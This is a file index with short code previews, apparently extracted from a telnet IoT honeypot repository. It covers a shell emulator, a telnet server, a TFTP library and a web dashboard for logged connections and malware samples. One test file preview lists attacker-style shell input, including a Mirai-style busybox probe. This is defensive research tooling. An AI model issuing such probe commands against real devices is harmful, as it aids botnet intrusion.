"preview": "grammar cmd\n\ncmd <- cmdlist / empty\ncmdlist <- cmdsingle (sep (\";\" / \"&\") sep cmdlist)? "
},
{
"path": "honeypot/shell/grammar.py",
"chars": 48209,
"preview": "from collections import defaultdict\nimport re\n\n\nclass TreeNode(object):\n def __init__(self, text, offset, elements=No"
},
{
"path": "honeypot/shell/shell.py",
"chars": 14825,
"preview": "import sys\nimport traceback\n\nfrom grammar import parse, TreeNode\nfrom commands.base import Proc\n\ndef filter_ascii("
},
{
"path": "honeypot/shell/test.sh",
"chars": 76,
"preview": "#!/bin/bash\ncanopy grammar.peg --lang python && python shell.py < test.txt\n\n"
},
{
"path": "honeypot/shell/test.txt",
"chars": 4565,
"preview": "cp\nls\ncat\ndd\nrm\necho\nbusybox\nsh\ncd\ntrue\nfalse\nchmod\nuname\n:\nps\n\nenable\nshell\nsh\n/bin/busybox ECCHI\n/bin/busybox ps; /bin"
},
{
"path": "honeypot/telnet.py",
"chars": 5669,
"preview": "import struct\nimport socket\nimport traceback\nimport time\n\nfrom thread import start_new_thread\n\nfrom session import Sessi"
},
{
"path": "honeypot.py",
"chars": 2072,
"preview": "import os\nimport sys\nimport signal\nimport json\nimport socket\n\nfrom honeypot.telnet import Telnetd\nfrom honeypot.cli"
},
{
"path": "html/.gitignore",
"chars": 17,
"preview": "db.php\napiurl.js\n"
},
{
"path": "html/admin.html",
"chars": 1513,
"preview": "<img src=\"img/icon.svg\" style=\"height: 10em; margin-top: -4em; padding: 1em; background: white;\" class=\"pull-right\">\n\n<d"
},
{
"path": "html/asn.html",
"chars": 961,
"preview": "<h1>ASN Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Name</td><td><b>{{ asn.name }}</b></td></tr>\n\t<tr><td>Country</td><td"
},
{
"path": "html/common.js",
"chars": 2170,
"preview": "\nvar fakenames = [\"Boar\",\"Stallion\",\"Yak\",\"Beaver\",\"Salamander\",\"Eagle Owl\",\"Impala\",\"Elephant\",\"Chameleon\",\"Argali\",\"Le"
},
{
"path": "html/connection.html",
"chars": 3748,
"preview": "<h1>Connection Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Date</td><td>{{ formatDate(connection.date) }}</td></tr>\n\t<tr>"
},
{
"path": "html/connectionlist-embed.html",
"chars": 1290,
"preview": "<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Date</th>\n\t\t<th ng-show=\"!filter['ip']\">IP</th>\n\t\t<th ng-show=\"!filte"
},
{
"path": "html/connectionlist.html",
"chars": 985,
"preview": "<h2>Connections</h2>\n\n<div class=\"well well-sm\" style=\"font-family: monospace\">\n\t<div style=\"font-size: 0.7em;\">\n\t\tFilte"
},
{
"path": "html/countries.js",
"chars": 4674,
"preview": "var COUNTRY_LIST = {\"AF\":\"Afghanistan\",\"AX\":\"Åland Islands\",\"AL\":\"Albania\",\"DZ\":\"Algeria\",\"AS\":\"American Samoa\",\"AD\":\"An"
},
{
"path": "html/fancy/connhash/index.html",
"chars": 2632,
"preview": "<!doctype html>\n<html>\n<head>\n <title>Network | Hierarchical layout</title>\n\n <style type=\"text/css\">\n body"
},
{
"path": "html/fancy/graph/index.html",
"chars": 4946,
"preview": "<html>\n<head>\n\n<meta charset=\"utf-8\"/>\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\n<script src"
},
{
"path": "html/img/LICENSE",
"chars": 129,
"preview": "Bee Icon by alican\nhttps://thenounproject.com/search/?q=bee&i=573797\nCC BY 3.0 (https://creativecommons.org/licenses/by/"
},
{
"path": "html/img/flags/LICENSE",
"chars": 509,
"preview": "Flag icons - http://www.famfamfam.com\n\nThese icons are public domain, and as such are free for any use (attribution appr"
},
{
"path": "html/index.html",
"chars": 3601,
"preview": "<html>\n<head>\n\n<meta charset=\"utf-8\"/>\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\n\n<link rel="
},
{
"path": "html/js/angular-vis.js",
"chars": 7569,
"preview": "angular.module('ngVis', [])\n\n .factory('VisDataSet', function () {\n 'use strict';\n return function (dat"
},
{
"path": "html/network.html",
"chars": 1828,
"preview": "\n<h1>Network Info</h1>\n<div class=\"row\">\n\t<div class=\"col-md-6 col-xs-12\">\n\t\t<table class=\"table\">\n\n\t\t\t<tr><td>id</td><t"
},
{
"path": "html/networks.html",
"chars": 1090,
"preview": "<h1>Networks</h1>\n\n<!--<h2>Connections from the Network <small><a href=\"#/connections?network_id={{ network.id }}\">see a"
},
{
"path": "html/overview.html",
"chars": 2932,
"preview": "<img src=\"img/icon.svg\" style=\"height: 10em; margin-top: -4em; padding: 1em; background: white;\" class=\"pull-right\">\n\n<d"
},
{
"path": "html/sample.html",
"chars": 1418,
"preview": "<h1>Sample Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>First seen</td><td>{{ formatDate(sample.date) }}</td></tr>\n\t<tr><t"
},
{
"path": "html/sample.js",
"chars": 16805,
"preview": "var isMobile = false; //initiate as false\n// device detection\nif(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberr"
},
{
"path": "html/samples.html",
"chars": 598,
"preview": "<h2>Samples</h2>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th class=\"hidden-xs\">SHA256</th>\n\t\t<th>Name</th>\n\t\t<th"
},
{
"path": "html/tag.html",
"chars": 331,
"preview": "<h1>Tag Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>Name</td><td>{{ tag.name }}</td></tr>\n\t<tr><td>Code</td><td><span sty"
},
{
"path": "html/tags.html",
"chars": 336,
"preview": "<h1>Tags</h1>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Name</th>\n\t\t<th>Code</th>\n\t\t<th>N⁰ Hits</th>\n\t</tr>\n\t<"
},
{
"path": "html/url.html",
"chars": 1558,
"preview": "<h1>URL Info</h1>\n\n<table class=\"table\">\n\n\t<tr><td>URL</td><td>{{ url.url }}</td></tr>\n\t<tr><td>First seen</td><td>{{ fo"
},
{
"path": "html/urls.html",
"chars": 782,
"preview": "<h1>Urls</h1>\n\n<table class=\"table table-condensed\">\n\n\t<tr>\n\t\t<th>Country</th>\n\t\t<th>Url</th>\n\t\t<th>Date</th>\n\t\t<th clas"
},
{
"path": "requirements.txt",
"chars": 140,
"preview": "setuptools\nwerkzeug\nflask\nflask-httpauth\nflask-socketio\nsqlalchemy\nrequests\ndecorator\ndnspython\nipaddress\nsimpleeval\npyy"
},
{
"path": "tftpy/TftpClient.py",
"chars": 4917,
"preview": "\"\"\"This module implements the TFTP Client functionality. Instantiate an\ninstance of the client, and then use its upload "
},
{
"path": "tftpy/TftpContexts.py",
"chars": 14487,
"preview": "\"\"\"This module implements all contexts for state handling during uploads and\ndownloads, the main interface to which bein"
},
{
"path": "tftpy/TftpPacketFactory.py",
"chars": 1454,
"preview": "\"\"\"This module implements the TftpPacketFactory class, which can take a binary\nbuffer, and return the appropriate TftpPa"
},
{
"path": "tftpy/TftpPacketTypes.py",
"chars": 16397,
"preview": "\"\"\"This module implements the packet types of TFTP itself, and the\ncorresponding encode and decode methods for them.\"\"\"\n"
},
{
"path": "tftpy/TftpServer.py",
"chars": 8846,
"preview": "\"\"\"This module implements the TFTP Server functionality. Instantiate an\ninstance of the server, and then run the listen("
},
{
"path": "tftpy/TftpShared.py",
"chars": 1734,
"preview": "\"\"\"This module holds all objects shared by all other modules in tftpy.\"\"\"\n\nimport logging\n\nLOG_LEVEL = logging.NOTSET\nMI"
},
{
"path": "tftpy/TftpStates.py",
"chars": 23405,
"preview": "\"\"\"This module implements all state handling during uploads and downloads, the\nmain interface to which being the TftpSta"
},
{
"path": "tftpy/__init__.py",
"chars": 755,
"preview": "\"\"\"\nThis library implements the tftp protocol, based on rfc 1350.\nhttp://www.faqs.org/rfcs/rfc1350.html\nAt the moment it"
},
{
"path": "util/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "util/config.py",
"chars": 972,
"preview": "import yaml\nimport random\nimport string\n\ndef rand():\n\tchars = string.ascii_uppercase + string.digits\n\treturn ''.join(ran"
},
{
"path": "util/dbg.py",
"chars": 347,
"preview": "import datetime\nimport traceback\nimport sys\nimport os.path\n\nDEBUG = True\n\ndef dbg(msg):\n\tif DEBUG:\n\t\tnow = datetime.dat"
},
{
"path": "vagrant/.gitignore",
"chars": 16,
"preview": ".vagrant\n*.log\n\n"
},
{
"path": "vagrant/mariadb/Vagrantfile",
"chars": 3672,
"preview": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# conf"
},
{
"path": "vagrant/mariadb/mysql.sh",
"chars": 614,
"preview": "#/bin/bash\n\necho \" - Install MariaDB\"\nsudo apt-get install -y mariadb-server\n\nuser=honey\ndb=honey\npw=$(openssl rand -hex"
},
{
"path": "vagrant/sqlite/Vagrantfile",
"chars": 3601,
"preview": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# All Vagrant configuration is done below. The \"2\" in Vagrant.configure\n# conf"
}
]
About this extraction
This page contains the source code of the Phype/telnet-iot-honeypot GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction covers 82 files (309.8 KB, approximately 84.1k tokens) plus a symbol index of 493 extracted functions, classes, methods, constants, and types.
Extracted by GitExtract, built by Nikandr Surkov.